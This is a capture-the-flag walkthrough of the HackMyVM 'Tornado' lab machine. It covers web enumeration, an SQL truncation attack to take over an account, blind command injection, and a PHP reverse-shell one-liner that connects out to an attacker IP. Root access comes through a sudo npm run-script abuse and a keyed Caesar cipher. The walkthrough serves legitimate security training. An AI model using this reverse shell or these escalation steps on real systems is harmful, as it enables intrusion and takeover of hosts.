# HackMyVM - Tornado ##### Credit to the creator of the VM @catch_me75 --- Now as always let’s start with a nmap scan. **Enumeration** ```default # Nmap 7.91 scan initiated Wed Dec 30 10:01:46 2020 as: nmap -sC -sV -p22,80 -oN nmap IP Nmap scan report for tornado (IP) Host is up (0.00064s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 0f:57:0d:60:31:4a:fd:2b:db:3e:9e:2f:63:2e:35:df (RSA) | 256 00:9a:c8:d3:ba:1b:47:b2:48:a8:88:24:9f:fe:33:cc (ECDSA) |_ 256 6d:af:db:21:25:ee:b0:a6:7d:05:f3:06:f0:65:ff:dc (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Apache2 Debian Default Page: It works MAC Address: 08:00:27:45:15:72 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Dec 30 10:01:53 2020 -- 1 IP address (1 host up) scanned in 7.62 seconds ``` Once we visit the website we see the apache2 default page so let’s fire up gobuster and enumerating the port 80. ```gherkin= gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt ``` /index.html (Status: 200) /manual (Status: 301) /javascript (Status: 301) /bluesky (Status: 301) /server-status (Status: 403) We have a /bluesky directory and nothing special there.. uuhm. Let's enumerate this one.  ```gherkin= gobuster dir -q -u http://$ip/bluesky -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt ``` /index.html (Status: 200) /contact.php (Status: 302) /about.php (Status: 302) /login.php (Status: 200) /signup.php (Status: 200) /css (Status: 301) /imgs (Status: 301) /js (Status: 301) /logout.php (Status: 302) /dashboard.php (Status: 302) /port.php (Status: 302) We can see a login page.  Let's have a look at the source code ```htmlembedded= <input type="text" name="uname" placeholder="email" maxlength="13"><br><br> <input type="password" name="upass" placeholder="password"><br><br> <input type="submit" value="Login" name="btn" class="button"><br> ``` We can see that the maximum character length is 13. There was another signup.php page. Have a look at it and sign up.  In the dashboard we can navigate between home, about and portfolio. Only the contact page cannot be viewed - the comment feature has been turned off because of security purpose. In the source code of "Portfolio", we find a hint.  mmh... interesting! Let's check it out Tried LFI vulnerability to access the imp.txt file but got nothing, then I remembered there is a way we can create alias in apache config file and also in linux cd ~user means home directory of user, so I though to give a try for ~tornado and then I found the imp.txt  **imp.txt** ```default ceo@tornado cto@tornado manager@tornado hr@tornado lfi@tornado admin@tornado jacob@tornado it@tornado sales@tornado ``` We find several emails and I enumerate them all with rockyou dict. The only password I found was **admin@tornado:hello** But that turned out to be a rabbit hole.... we do not find anything new after we are logged in. --- **Do you remember the maximum character length of 13?** This brings me to the SQL Truncation Attack The SQL Truncation vulnerability is a very interesting flaw in the database. The successful exploitation of this issue leads to user account compromise, as it means an attacker can access any users account with his own password. Sounds interesting! ```htmlembedded= <input type="text" name="uname" placeholder="email" maxlength="13"> ``` Change the maxlength 13 to 15 ```htmlembedded= <input type="text" name="uname" placeholder="email" maxlength="15"> ``` Let's not waste time and register with jacob@tornado email but with one space and one character.  So we registered jacob from this form and then logged in into the application. "Welcome User jacob@tornado" successfully logged in. We find a comment field on the contact page that was not available before.  Here's the tricky part, because if you run id command in contact page, it will not show you any output. Using sleep 30 command it was confirmed that this is RCE vulnerability. ## Shell as www-data use php reverse shell and start a Netcat listener. > php -r '$sock=fsockopen("Ip",Port);exec("/bin/sh -i <&3 >&3 2>&3");' > ```bash www-data@tornado:/var/www/html/bluesky$ whoami && id whoami && id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@tornado:/var/www/html/bluesky$ ``` **sudo -l** (catchme) NOPASSWD: /usr/bin/npm npm is a package manager for the JavaScript programming language. ## Road to User First i created an index.js file cd /tmp mkdir shell echo 'module.exports = install could be dangerous' > index.js cp index.js shell Now we need a package.json file and chmod to make it executable. ```json= { "name": "shell", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "shell": "/bin/bash" }, "author": "", "license": "ISC" } ``` Finally, execute the script - command: > sudo -u catchme npm run-script shell   ## Shell as root I enumerated a lot but i really didn’t find something exploitable. In the home directory of catchme, you will find a python script called enc.py It's Caesar keyed and similar to rot13. Find the encrypted string inside and either rewrite the code, or go to this website (http://rumkin.com/tools/cipher/caesar-keyed.php) and enter each letter individually. Example: a, b, c, d, e... **Once you have done it correctly, you will find the root password :)**  --- Tornado created by **catch_me75** (thank you) This machine can be found at **HackMyVM** **-->** Check it out! > https://hackmyvm.eu